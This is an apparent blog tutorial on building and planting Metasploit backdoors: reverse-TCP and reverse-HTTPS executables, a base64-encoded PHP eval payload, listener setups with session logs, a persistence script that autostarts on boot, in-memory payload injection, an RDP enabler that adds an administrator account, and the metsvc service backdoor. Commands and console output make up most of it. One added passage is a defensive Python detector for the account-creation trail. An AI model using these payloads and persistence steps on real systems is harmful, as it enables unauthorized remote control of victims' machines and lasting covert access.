11 Metasploit executable backdoors
Posted on 2012-8-5 20:44:16

It can generate backdoors for Linux, Windows, PHP, ASP, JSP and so on.

msfpayload as shellcode

View the full list; at the moment there are 248 payloads:


  root@Dis9Team:/home/brk# msfpayload -l

It can generate all kinds of them. To keep it simple, here is one example.

A normal Windows backdoor uses windows/meterpreter/reverse_tcp:

  msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
    msfencode -b '' -t exe -o /var/www/meterpreter.exe
After generating it, get the target to run it; on our side we need a listener waiting for the shell:
  msf > use exploit/multi/handler
  msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf  exploit(handler) > set LHOST 5.5.5.1
  LHOST => 5.5.5.1
  msf  exploit(handler) > set LPORT 8080
  LPORT => 8080
  msf  exploit(handler) > exploit

  [*] Started reverse handler on 5.5.5.1:8080
  [*] Starting the payload handler...
  [*] Sending stage (752128 bytes) to 5.5.5.3
  [*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800

  meterpreter >
For the others (php, asp, jsp, dll), pick the msfpayload name you want and generate it; you know the drill. For example:
DLL: see The DLL Hijacking Tutorial
php:
  msf payload(bind_php) > generate -t raw -e php/base64
  eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));
Java:
  ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar
Abnormal Windows backdoors: where there are normal ones there are naturally abnormal ones too, for example reverse_https and reverse_http.
Everyone knows these walk straight through firewalls. Once generated, a connection that is unexpectedly interrupted can reconnect later, just like Gray Pigeon (灰鸽子). The default is 5 minutes; you can set the SessionExpirationTimeout option to 0, which means the connection never expires.
  brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
  brk@Dis9Team:~$ file https.exe
  https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Now let's run it.
  msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
  PAYLOAD => windows/meterpreter/reverse_https
  msf  exploit(handler) > set LHOST 5.5.5.1
  LHOST => 5.5.5.1
  msf  exploit(handler) > set LPORT 1111
  LPORT => 1111
  msf  exploit(handler) > set SessionCommunicationTimeout 0
  SessionCommunicationTimeout => 0
  msf  exploit(handler) > set ExitOnSession false
  ExitOnSession => false
  msf  exploit(handler) > exploit -j
  [*] Exploit running as background job.

  [*] Started HTTPS reverse handler on https://5.5.5.1:1111/
  msf  exploit(handler) > [*] Starting the payload handler...
  [*] 5.5.5.3:1060 Request received for /AauE...
  [*] 5.5.5.3:1060 Staging connection for target /AauE received...
  [*] Patched transport at offset 486516...
  [*] Patched URL at offset 486248...
  [*] Patched Expiration Timeout at offset 641856...
  [*] Patched Communication Timeout at offset 641860...
  [*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800
Success. I clicked it a couple of times, so there are two shells; let's kill the sessions.
  msf  exploit(handler) > sessions

  Active sessions
  ===============

    Id  Type                   Information                    Connection
    --  ----                   -----------                    ----------
    2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
    3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
  msf  exploit(handler) > sessions -k 2
  [*] Killing session 2
  [*] Meterpreter session 2 closed.
  msf  exploit(handler) > sessions -k 3
  [*] Killing session 3
  [*] Meterpreter session 3 closed.
  msf  exploit(handler) > sessions

  Active sessions
  ===============

  No active sessions.

  msf  exploit(handler) >
Keep listening:
  msf  exploit(handler) > exploit -j
  [*] Exploit running as background job.

  [*] Started HTTPS reverse handler on https://5.5.5.1:1111/
  [*] Starting the payload handler...
  msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
  [*] 5.5.5.3:1280 Staging connection for target /AauE received...
  [*] Patched transport at offset 486516...
  [*] Patched URL at offset 486248...
  [*] Patched Expiration Timeout at offset 641856...
  [*] Patched Communication Timeout at offset 641860...
  [*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800
We got a shell again. persistence: this one is a post-exploitation module, and the prerequisite is that you already have a shell session. It creates a persistent backdoor that starts as a system service.
First connect to the shell and look at the help:
  msf  exploit(handler) > sessions -i 4
  meterpreter > run persistence -h
  Meterpreter Script for creating a persistent backdoor on a target host.

  OPTIONS:

      -A        Automatically start a matching multi/handler to connect to the agent
      -L   Location in target host where to write payload to, if none %TEMP% will be used.
      -P   Payload to use, default is windows/meterpreter/reverse_tcp.
      -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
      -T   Alternate executable template to use
      -U        Automatically start the agent when the User logs on
      -X        Automatically start the agent when the system boots
      -h        This help menu
      -i   The interval in seconds between each connection attempt
      -p   The port on the remote host where Metasploit is listening
      -r   The IP of the system running Metasploit listening for the connect back

  meterpreter >
Now let's run it:
  meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
  [*] Running Persistance Script
  [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
  [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
  [*] Persistent agent script is 609512 bytes long
  [+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
  [*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
  [+] Multi/Handler started!
  [*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
  [+] Agent executed with PID 3280
  meterpreter >
It is installed in c:\windows and tries port 1234 every 5 seconds; our machine is 5.5.5.1.
Now let's see what happened on the target machine: there are a few extra VBS files, and that is the trojan. Whenever we reboot or log on it runs automatically. So how do we remove it afterwards?
  [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
Run it:
  meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
  [*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
  [*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs
payload_inject injects another payload. For example:
  msf  exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
  msf  post(payload_inject) >
  msf  post(payload_inject) > show options

  Module options (post/windows/manage/payload_inject):

     Name     Current Setting                  Required  Description
     ----     ---------------                  --------  -----------
     HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
     LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
     LPORT    4433                             no        Port for Payload to connect to.
     OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
     PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
     PID                                       no        Process Identifier to inject of process to inject payload.
     SESSION                                   yes       The session to run this module on.

  msf  post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
  PAYLOAD => windows/meterpreter/reverse_https
  msf  post(payload_inject) > set LPORT 9999
  LPORT => 9999
  msf  post(payload_inject) > set TimestampOutput 0
  TimestampOutput => 0
  msf  post(payload_inject) > set SESSION 5
  SESSION => 5
  msf  post(payload_inject) > exploit

  [*] Running module against DIS9TEAM-A1
  [*] Performing Architecture Check
  [*] Process found checking Architecture
  [+] Process is the same architecture as the payload
  [*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
  [*] Opening process 1636
  [*] Generating payload
  [*] Allocating memory in procees 1636
  [*] Allocated memory at address 0x00780000, for 363 byte stager
  [*] Writing the stager into memory...
  [+] Successfully injected payload in to process: 1636
  [*] Post module execution completed
  msf  post(payload_inject) > sessions

  Active sessions
  ===============

    Id  Type                   Information                        Connection
    --  ----                   -----------                        ----------
    4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
    5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

  msf  post(payload_inject) >

TCP Shell Session: sets up a backdoor according to the scripting environment installed on the target. The options are auto, ruby, python, perl and bash, and it works on Linux too.
Since I have none of those installed... well, you get the idea.
  msf  post(system_session) > show options

  Module options (post/multi/manage/system_session):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
     LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
     LPORT    4433             no        Port for Payload to connect to.
     SESSION                   yes       The session to run this module on.
     TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

  msf  post(system_session) > set HANDLER true
  HANDLER => true
  msf  post(system_session) > sessions

  Active sessions
  ===============

    Id  Type                   Information                        Connection
    --  ----                   -----------                        ----------
    4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
    5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

  msf  post(system_session) > set SESSION 5
  SESSION => 5
  msf  post(system_session) > exploit
  [-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
  msf  post(system_session) > set TYPE bash
  TYPE => bash
  msf  post(system_session) > exploit

  [*] Starting exploit multi handler
  [*] Started reverse handler on 5.5.5.1:4433
  [*] Starting the payload handler...
  [*] Post module execution completed
  msf  post(system_session) > set TYPE python
  TYPE => python
  msf  post(system_session) > exploit

  [*] Starting exploit multi handler
  [-] Job 4 is listening on IP 5.5.5.1 and port 4433
  [-] Could not start handler!
  [-] A job is listening on the same Port
  [*] Post module execution completed
  msf  post(system_session) > set LPORT 5555
  LPORT => 5555
  msf  post(system_session) > exploit

  [*] Starting exploit multi handler
  [*] Started reverse handler on 5.5.5.1:5555
  [*] Starting the payload handler...
  [*] Post module execution completed
  msf  post(system_session) >
pxexploit: see the module description:
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a linux kernel and initrd into
memory that reads the hard drive; placing a payload to install
metsvc, disable the firewall, and add a new user metasploit on any
Windows partition seen, and add a uid 0 user with username and
password metasploit to any linux partition seen. The windows user
will have the password p@SSw0rd!123456 (in case of complexity
requirements) and will be added to the administrators group. See
exploit/windows/misc/pxesploit for a version to deliver a specific
payload. Note: the displayed IP address of a target is the address
this DHCP server handed out, not the “normal” IP address the host
uses.
I don't have the setup for it, so no demo.
Automatic 3389 is simple: enter the module and set the username, password and port.
  msf  post(enable_rdp) > show options

  Module options (post/windows/manage/enable_rdp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     ENABLE    true             no        Enable the RDP Service and Firewall Exception.
     FORDWARD  false            no        Forward remote port 3389 to local Port.
     LPORT     3389             no        Local port to fordward remote connection.
     PASSWORD                   no        Password for the user created.
     SESSION                    yes       The session to run this module on.
     USERNAME                   no        The username of the user to create.

  msf  post(enable_rdp) > set USERNAME test
  USERNAME => test
  msf  post(enable_rdp) > set PASSWORD test
  PASSWORD => test
  msf  post(enable_rdp) > set SESSION 5
  SESSION => 5
  msf  post(enable_rdp) > exploit

  [*] Enabling Remote Desktop
  [*]         RDP is disabled; enabling it ...
  [*] Setting Terminal Services service startup mode
  [*]         The Terminal Services service is not set to auto, changing it to auto ...
  [*]         Opening port in local firewall if necessary
  [*] Setting user account for logon
  [*]         Adding User: test with Password: test
  [*]         Adding User: test to local group 'Remote Desktop Users'
  [*]         Adding User: test to local group 'Administrators'
  [*] You can now login with the created user
  [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
  [*] Post module execution completed
  msf  post(enable_rdp) >
Let's check whether 3389 is open:
  msf  post(enable_rdp) > nc -v 5.5.5.3 3389
  [*] exec: nc -v 5.5.5.3 3389

  Connection to 5.5.5.3 3389 port [tcp/*] succeeded!
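The enable_rdp run above leaves a very recognisable trail in the Windows Security log: a new local account, immediately added to both 'Remote Desktop Users' and 'Administrators'. The following added example (not from the original post, not Metasploit code) correlates those two events, 4720 (user account created) and 4732 (member added to a security-enabled local group), and raises one alert per account that is created and made privileged within a short window. The events are a constructed sample; the five-minute window and the field names are assumptions of the example.

```python
from datetime import datetime, timedelta

EVENT_USER_CREATED = 4720     # Security log: a user account was created
EVENT_LOCAL_GROUP_ADD = 4732  # Security log: a member was added to a security-enabled local group
PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users"}
WINDOW = timedelta(minutes=5)  # assumption: one tool does both steps within seconds


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def correlate(events):
    """Pair every 4720 with the 4732 events that put the same new account into a
    privileged group inside WINDOW; return one alert per matching account."""
    alerts = []
    adds = [e for e in events if e["id"] == EVENT_LOCAL_GROUP_ADD]
    for created in (e for e in events if e["id"] == EVENT_USER_CREATED):
        t0 = _ts(created)
        groups = sorted({
            a["group"] for a in adds
            if a["member"] == created["target"]
            and a["group"] in PRIVILEGED_GROUPS
            and timedelta(0) <= _ts(a) - t0 <= WINDOW
        })
        if groups:
            alerts.append({
                "account": created["target"],
                "created": created["time"],
                "subject": created["subject"],
                "groups": groups,
            })
    return alerts


# Constructed sample: the first three records mirror what the module's actions would
# log (the module ran from a SYSTEM session, so the subject is the machine account);
# the rest are ordinary administration that must not alert.
SAMPLE_EVENTS = [
    {"time": "2012-03-22 00:31:20", "id": 4720, "subject": "DIS9TEAM-A1$", "target": "test"},
    {"time": "2012-03-22 00:31:20", "id": 4732, "subject": "DIS9TEAM-A1$",
     "member": "test", "group": "Remote Desktop Users"},
    {"time": "2012-03-22 00:31:21", "id": 4732, "subject": "DIS9TEAM-A1$",
     "member": "test", "group": "Administrators"},
    {"time": "2012-03-22 09:15:00", "id": 4720, "subject": "brk", "target": "jsmith"},
    {"time": "2012-03-22 09:16:00", "id": 4732, "subject": "brk",
     "member": "jsmith", "group": "Users"},
    {"time": "2012-03-22 10:00:00", "id": 4732, "subject": "brk",
     "member": "brk", "group": "Remote Desktop Users"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print("%(created)s new account %(account)s (by %(subject)s) added to %(groups)s" % alert)
```

The same pairing works on exported EVTX fields once they are mapped to the `target`, `member` and `group` keys used here; an account added to a privileged group without a matching 4720 (the last sample record) is a lower-severity case and is deliberately left to a separate rule.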
It is open, and of course you can switch to another port. Inject in Memory: this one is awesome, in-memory injection.
  msf  post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
  msf  post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
  msf  post(multi_meterpreter_inject) > set HANDLER true
  HANDLER => true
  msf  post(multi_meterpreter_inject) > set LPORT 5624
  LPORT => 5624
  msf  post(multi_meterpreter_inject) > exploit

  [*] Running module against DIS9TEAM-A1
  [*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
  [+] Multi/Handler started!
  [*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
  [+] Starting Notepad.exe to house Meterpreter Session.
  [+] Process created with pid 1168
  [*] Injecting meterpreter into process ID 1168
  [*] Allocated memory at address 0x00780000, for 290 byte stager
  [*] Writing the stager into memory...
  [+] Successfully injected Meterpreter in to process: 1168
  [*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
  [*] Post module execution completed
  msf  post(multi_meterpreter_inject) >
Got a shell. metsvc door: a backdoor that starts as a system service.
First get the tool:
  brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
  --2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
  正在解析主机 www.phreedom.org... 66.45.226.226
  正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
  已发出 HTTP 请求,正在等待回应... 200 OK
  长度: 55871 (55K) [application/zip]
  正在保存至: “metsvc-1.0.zip”

  100%[======================================>] 55,871      46.2K/s   花时 1.2s

  2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])

  brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
  Archive:  metsvc-1.0.zip
     creating: metsvc-1.0/
    inflating: metsvc-1.0/ChangeLog.txt
    inflating: metsvc-1.0/metsvc-server.exe
    inflating: metsvc-1.0/metsvc.exe
    inflating: metsvc-1.0/README.txt
     creating: metsvc-1.0/src/
    inflating: metsvc-1.0/src/Makefile
    inflating: metsvc-1.0/src/metsvc-server.cpp
    inflating: metsvc-1.0/src/metsvc.cpp
    inflating: metsvc-1.0/src/metsvc.h
    inflating: metsvc-1.0/test.rb
  brk@Dis9Team:/tmp$ cd metsvc-1.0/
  brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
  metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
  meterpreter.jar    metsrv.dll         metsvc.exe
  brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
  brk@Dis9Team:/tmp/metsvc-1.0$ ls
  ChangeLog.txt  metsvc.exe         README.txt  test.rb
  metsrv.dll     metsvc-server.exe  src
  brk@Dis9Team:/tmp/metsvc-1.0$
Then upload:
  meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
  [*] uploading  : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
  [*] uploaded   : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
  meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
  [*] uploading  : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
  [*] uploaded   : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
  meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
  [*] uploading  : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
  [*] uploaded   : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
  meterpreter >
Install the service:
  meterpreter > shell
  Process 2632 created.
  Channel 6 created.
  Microsoft Windows XP [版本 5.1.2600]
  (C) 版权所有 1985-2001 Microsoft Corp.

  c:\windows>metsvc.exe install-service
  metsvc.exe install-service
  * Installing service metsvc
  * Starting service
  Service metsvc successfully installed.

  c:\windows>
Then, you know the rest:
  msf > use exploit/multi/handler
  msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
  PAYLOAD => windows/metsvc_bind_tcp
  msf  exploit(handler) > set LPORT 31337
  LPORT => 31337
  msf  exploit(handler) > set RHOST 5.5.5.3
  RHOST => 5.5.5.3
  msf  exploit(handler) > exploit

  [-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
  [*] Started bind handler
  [*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800

  meterpreter >

Closing words: there is a lot more I would like to cover, but I have no time to build the environments, so I'll stop here.
